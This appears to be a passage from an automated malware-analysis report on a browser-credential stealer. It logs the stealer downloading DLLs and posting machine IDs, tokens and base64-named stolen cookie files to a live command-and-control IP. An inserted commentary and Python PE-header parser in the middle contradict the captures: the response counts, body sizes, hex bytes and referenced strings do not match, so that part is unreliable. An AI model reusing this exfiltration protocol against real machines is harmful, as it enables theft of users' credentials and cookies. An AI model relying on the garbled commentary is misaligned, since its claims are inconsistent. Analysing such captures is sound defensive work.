Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
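
The seven responses above are served as Content-Type: application/x-msdos-program and each body starts with the MZ/PE magic; that is what the "Downloads executable code via HTTP" signature rests on. The parser below is an added example for this page, not report tooling: it reads the DOS and file headers of a response body, decodes the link timestamp and characteristics, and walks only as many section entries as the capture actually contains instead of trusting NumberOfSections. Its input is the first 0x98 bytes of the first response above, reconstructed from that hex dump (the rest of the 1106998-byte body is not reproduced); the link timestamp decodes to 2022-09-05 11:30:31 UTC, the same day as the server's Last-Modified header, consistent with these being old builds of third-party DLLs rather than freshly compiled payloads. `build_minimal_pe` is a constructed helper, not a real binary, so the section walk can be exercised on a complete header set.

```python
"""Confirm that an HTTP response body is a PE image and pull the file-header
fields worth recording from it, tolerating a truncated capture."""
import struct
from datetime import datetime, timezone

# Constructed from the first 0x98 bytes of the first captured download above
# (the 1106998-byte body); everything past the file header is not reproduced.
CAPTURED_PREFIX = bytes.fromhex(
    "4d5a90000300000004000000ffff0000b8000000000000004000000000000000"
    + "00" * 28 + "80000000"                                   # e_lfanew = 0x80
    "0e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000"
    "504500004c011200d7dd156300920e00bf130000e0000621"          # "PE\0\0" + file header
)

MACHINES = {0x14C: "i386", 0x8664: "x86-64"}
CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
                   0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
FILE_HEADER = "<HHIIIHH"   # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
                           # NumberOfSymbols, SizeOfOptionalHeader, Characteristics


def parse_pe_headers(data):
    """Parse DOS + file header and whatever part of the section table was captured."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing or beyond the captured bytes")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from(FILE_HEADER, data, e_lfanew + 4)
    sec_table = e_lfanew + 24 + opt_size            # section table follows the optional header
    names = []
    for i in range(nsec):                            # never read past what was captured
        off = sec_table + 40 * i
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "sections_declared": nsec,
        "sections_captured": names,
        "truncated": len(names) < nsec,
        "link_time": datetime.fromtimestamp(ts, timezone.utc).isoformat(),
        "characteristics": [n for bit, n in sorted(CHARACTERISTICS.items()) if chars & bit],
        "is_dll": bool(chars & 0x2000),
    }


def build_minimal_pe(section_names, characteristics=0x2102):
    """Constructed headers-only PE32 image (not loadable) to exercise the section walk."""
    opt_size = 0xE0
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                     # e_lfanew = 0x40
    file_hdr = b"PE\0\0" + struct.pack(FILE_HEADER, 0x14C, len(section_names), 0, 0, 0,
                                       opt_size, characteristics)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)                 # PE32 magic, rest zero
    secs = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + file_hdr + opt + secs


if __name__ == "__main__":
    for k, v in parse_pe_headers(CAPTURED_PREFIX).items():
        print(f"{k:>18}: {v}")
```

The DLL characteristic on the captured header is the quick confirmation that the download is a library the stealer loads itself (compare the mozglue/nss3 .pdb strings above) rather than a second-stage executable.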
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
Host: 185.231.69.191
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEHDAFHDHCBFIDGCFIDG
Host: 185.231.69.191
Content-Length: 217
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 46 43 31 33 33 35 30 45 30 31 36 37 31 32 32 37 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 2d 2d 0d 0a
Data Ascii: ------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="hwid"5A8FC13350E01671227304------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="build"LogsDiller------IEHDAFHDHCBFIDGCFIDG--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFIDGHDBAFIJJJJKJDHD
Host: 185.231.69.191
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 2d 2d 0d 0a
Data Ascii: ------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="message"browsers------BFIDGHDBAFIJJJJKJDHD--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG
Host: 185.231.69.191
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a
Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="message"plugins------IJDHDGDAAAAKFIDGHJDG--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBHost: 185.231.69.191Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 2d 2d 0d 0a Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="message"fplugins------IDAKJKEHDBGHIDHIEHDB--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 185.231.69.191Content-Length: 6359Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/sqlite3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDGHost: 185.231.69.191Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DBKKFCBAKKFBGCBFHJDG--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGCHost: 185.231.69.191Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 42 46 43 47 49 45 47 43 42 47 43 41 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 42 46 43 47 49 45 47 43 42 47 43 41 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 42 46 43 47 49 45 47 43 42 47 43 41 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 42 46 43 47 49 45 47 43 42 47 43 41 45 43 47 43 2d 2d 0d 0a Data Ascii: ------KKECBFCGIEGCBGCAECGCContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------KKECBFCGIEGCBGCAECGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKECBFCGIEGCBGCAECGCContent-Disposition: form-data; name="file"------KKECBFCGIEGCBGCAECGC--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 185.231.69.191Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 